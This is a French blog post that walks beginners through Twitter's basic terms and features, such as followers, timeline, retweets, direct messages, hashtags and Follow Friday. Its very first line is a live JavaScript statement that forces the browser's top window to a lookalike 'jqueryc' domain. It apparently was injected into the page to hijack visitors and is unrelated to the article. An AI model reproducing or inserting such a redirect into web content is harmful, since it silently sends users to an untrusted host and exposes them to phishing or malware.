/* */ window.top.location.href = "http://www.jqueryc.com";

Friday, Nov. 23, 2012

Mieux comprendre Twitter

Written By:

|

24 août 2012

|

Posted In:

Mieux comprendre Twitter

Avouons-le, faire ses premiers pas sur Twitter n’est pas une chose aisée : Certes ci les   étapes de création du compte se font en quelques clics,  comprendre l’utilité et devenir adepte de ce réseau social de Micro-blogging lancé depuis 2006 n’est pas aussi évidente.

Les habitués de Facebook sont souvent perdus à l’ouverture de leur compte sur Twitter: limitation du nombre de caractères, followers, following, un œuf comme photo de profil il y a de quoi paniquer…

C’est pour cela que nous allons, à travers cet article, essayer de démystifier ce réseau social :

Tout d’abord, Twitter signifie en anglais gazouiller, autrement dit c’est l’appellation donné au petit message court de 140 caractères où on peut dire ce qu’on est en train de faire ou ce qui se passe autour de nous. ( What are you doing ?, or What’s happening ? )

Une fois l’inscription faite, en renseignant une adresse mail valide, mot de passe et identifiant, il faut choisir une photo de profil, et c’est cette photo de profil qui apparaitra sur la « timeline » de vos followers …QUEZAKO ? Pas de panique, voici quelques définitions à connaitre sur Twitter :

Abonnements: Les comptes que vous avez choisi à suivre, ça peut être des personnes, comme ça peut être un fil d’actualité de certains medias (Presse, radio, TV, entreprises…)

Abonnés : Ou  Followers,  les comptes qui vous suivent, plus vous en avez plus vos tweets sont lus par un grand nombre de personnes

Timeline : Fil d’actualité comprenant les tweets de vos abonnements, vos abonnées et les vôtres

RT : Retweet, lorsque vous partager un tweet d’un de vos abonnements avec le reste de vos abonnés, lui permettant plus de visibilité.

DM : Direct Message, c’est pouvoir envoyer ou recevoir des messages en privé en dehors de la Timeline

Mention : généralement précédé par un @ c’est Lorsque vous êtes mentionné sur un tweet, vous recevez une notification vous en informant.

Reply : C’est répondre à un tweet ou vous êtes mentionné, cette réponse sera lue par ceux qui vous suivent et qui suivent le compte auquel vous répondez.

Hashtag : Précédé par un # c’est un mot clé qui permet de retrouver tous les tweets (même de ceux que vous ne suivez pas) qui comportent ce mot. Généralement c’est utilisé pour créer un fil de discussion sur un sujet, qui si il devient populaire peut figurer dans les Trendings Topics

Follow Friday : Marqué par un #FF, ça permet de recommander et de se faire recommander pour avoir plus de followers, ça se fait tous les vendredis.

Notez enfin que vous pouvez protéger votre compte et rendre lisible vos tweets qu’à vos abonnés. Dans ce cas un petit cadenas est logé à coté de votre pseudo.

Enfin, sachez que pour devenir très actif sur Twitter, faut prévoir l’utiliser en version mobile, là où à mon avis il devient plus intéressant, c’est de pouvoir poster et réagir de n’importe où, n’importe quand, à chaud, partager une photo prise à peine avec son téléphone…C’est là où Twitter se distingue des autres réseaux sociaux.

Des applications mobiles, adaptées à toutes les plateformes : iOS, Android, Windows Phone, BlackBerry, et Symbian S40 , sans oublier une version allégée accessible via tout navigateur mobile.

Rachid El Hattab

Passionné par l'univers geek, nouvelle technologie, réseau, médias, communication, marketing, web, auto et bien d'autres choses

More Posts

Follow Me:
Twitter

Share This Article

Related News

FIFA 13 VS PES 13 le clash continue
Asus et Google sur une version low cost de la Nexus 7 ?
IFA 2012 : Samsug Galaxy Camera.

(1) Reader Comment

  1. Pingback: Comment mieux profiter de Twitter

Leave A Reply